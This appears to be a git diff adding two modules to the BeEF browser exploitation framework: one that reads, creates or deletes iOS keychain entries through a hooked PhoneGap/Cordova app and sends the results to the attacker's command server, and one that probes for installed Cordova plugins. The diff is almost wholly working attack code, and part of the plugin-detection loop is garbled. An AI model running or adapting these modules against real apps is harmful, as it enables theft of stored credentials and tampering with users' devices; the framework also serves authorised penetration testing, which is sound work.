diff --git a/modules/phonegap/phonegap_keychain/command.js b/modules/phonegap/phonegap_keychain/command.js new file mode 100644 index 000000000..57d0f0693 --- /dev/null +++ b/modules/phonegap/phonegap_keychain/command.js @@ -0,0 +1,82 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// Phonegap_keychain +// +beef.execute(function() { + var servicename = "<%== @servicename %>"; + var key = "<%== @key %>"; + var value = "<%== @value %>"; + var action = "<%== @action %>"; + var result = ''; + var kc = ''; + + try { + kc = cordova.require("cordova/plugin/keychain"); + } catch (err) { + result = 'Unable to access keychain plugin'; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + } + + function onGet() + { + var win = function(value) { + result = result + "GET SUCCESS - Key: " + key + " Value: " + value; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + + }; + var fail = function(error) { + result = result + "GET FAIL - Key: " + key + " Error: " + error; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }; + + kc.getForKey(win, fail, key, servicename); + + } + + function onSet() + { + var win = function() { + result = result + "SET SUCCESS - Key: " + key; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }; + var fail = function(error) { + result = result + "SET FAIL - Key: " + key + " Error: " + error; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }; + + kc.setForKey(win, fail, key, servicename, value); + } + + function onRemove() + { + var win = function() { + result = result + "REMOVE SUCCESS - Key: " + key; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }; + var fail = function(error) { + result = result + "REMOVE FAIL - Key: " + key + " Error: " + error; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }; + + kc.removeForKey(win, fail, key, servicename); + } + + if (kc !== undefined) { + switch(action) { + case 'Read': + onGet(); + break; + case 'CreateUpdate': + onSet(); + break; + case 'Delete': + onRemove(); + break; + } + } + +}); diff --git a/modules/phonegap/phonegap_keychain/config.yaml b/modules/phonegap/phonegap_keychain/config.yaml new file mode 100644 index 000000000..bd1ae43d7 --- /dev/null +++ b/modules/phonegap/phonegap_keychain/config.yaml @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# Phonegap_keychain +# +beef: + module: + phonegap_keychain: + enable: true + category: "Phonegap" + name: "Keychain" + description: "Read/CreateUpdate/Delete Keychain Elements" + authors: ["staregate"] + target: + working: ["All"] diff --git a/modules/phonegap/phonegap_keychain/module.rb b/modules/phonegap/phonegap_keychain/module.rb new file mode 100644 index 000000000..17260b9ec --- /dev/null +++ b/modules/phonegap/phonegap_keychain/module.rb @@ -0,0 +1,53 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# Phonegap_keychain +# + +class Phonegap_keychain < BeEF::Core::Command + + def self.options + return [{ + 'name' => 'servicename', + 'description' => 'Service name', + 'ui_label'=>'Service name', + 'value' => 'ServiceNameTest', + 'width' => '300px' + + },{ + 'name' => 'key', + 'description' => 'Key', + 'ui_label'=>'Key', + 'value' => 'TestKey', + 'width' => '300px' + },{ + 'name' => 'value', + 'description' => 'Value', + 'ui_label'=>'Value', + 'value' => 'TestValue', + 'width' => '100px' + },{ + 'name' => 'action', + 'type' => 'combobox', + 'ui_label' => 'Action Type', + 'store_type' => 'arraystore', + 'store_fields' => ['action'], + 'store_data' => [['Read'],['CreateUpdate'],['Delete']], + 'valueField' => 'action', + 'value' => 'CreateUpdate', + editable: false, + 'displayField' => 'action', + 'mode' => 'local', + 'autoWidth' => true + }] + end + + def callback + content = {} + content['Result'] = @datastore['result'] + save content + end + +end diff --git a/modules/phonegap/phonegap_plugin_detection/command.js b/modules/phonegap/phonegap_plugin_detection/command.js new file mode 100644 index 000000000..557566d76 --- /dev/null +++ b/modules/phonegap/phonegap_plugin_detection/command.js @@ -0,0 +1,49 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// phonegap_plugin_detection +// +beef.execute(function() { + var result = ''; + + // Approximate list of plugins, intended to work with Cordova 2.x + var plugins = new Array( + "cordova/plugin/device", + "cordova/plugin/logger", + "cordova/plugin/compass", + "cordova/plugin/accelerometer", + "cordova/plugin/Camera", + "cordova/plugin/network", + "cordova/plugin/contacts", + "cordova/plugin/echo", + "cordova/plugin/File", + "cordova/plugin/FileTransfer", + "cordova/plugin/geolocation", + "cordova/plugin/notification", + "cordova/plugin/Media", + "cordova/plugin/capture", + "cordova/plugin/splashscreen", + "cordova/plugin/battery", + "cordova/plugin/globalization", + "cordova/plugin/InAppBrowser", + "cordova/plugin/keychain" + ); + + for (var i=0; i", <%= @command_id %>, 'result='+result ); + +}); \ No newline at end of file diff --git a/modules/phonegap/phonegap_plugin_detection/config.yaml b/modules/phonegap/phonegap_plugin_detection/config.yaml new file mode 100644 index 000000000..a5a09713e --- /dev/null +++ b/modules/phonegap/phonegap_plugin_detection/config.yaml @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# phonegap_plugin_detection +# +beef: + module: + phonegap_plugin_detection: + enable: true + category: "Phonegap" + name: "List Plugins" + description: "Attempts to guess installed plugins." + authors: ["staregate"] + target: + working: ["All"] diff --git a/modules/phonegap/phonegap_plugin_detection/module.rb b/modules/phonegap/phonegap_plugin_detection/module.rb new file mode 100644 index 000000000..f9567f8bf --- /dev/null +++ b/modules/phonegap/phonegap_plugin_detection/module.rb @@ -0,0 +1,14 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# // phonegap_plugin_detection + +class Phonegap_plugin_detection < BeEF::Core::Command + def post_execute + content = {} + content['Result'] = @datastore['result'] + save content + end +end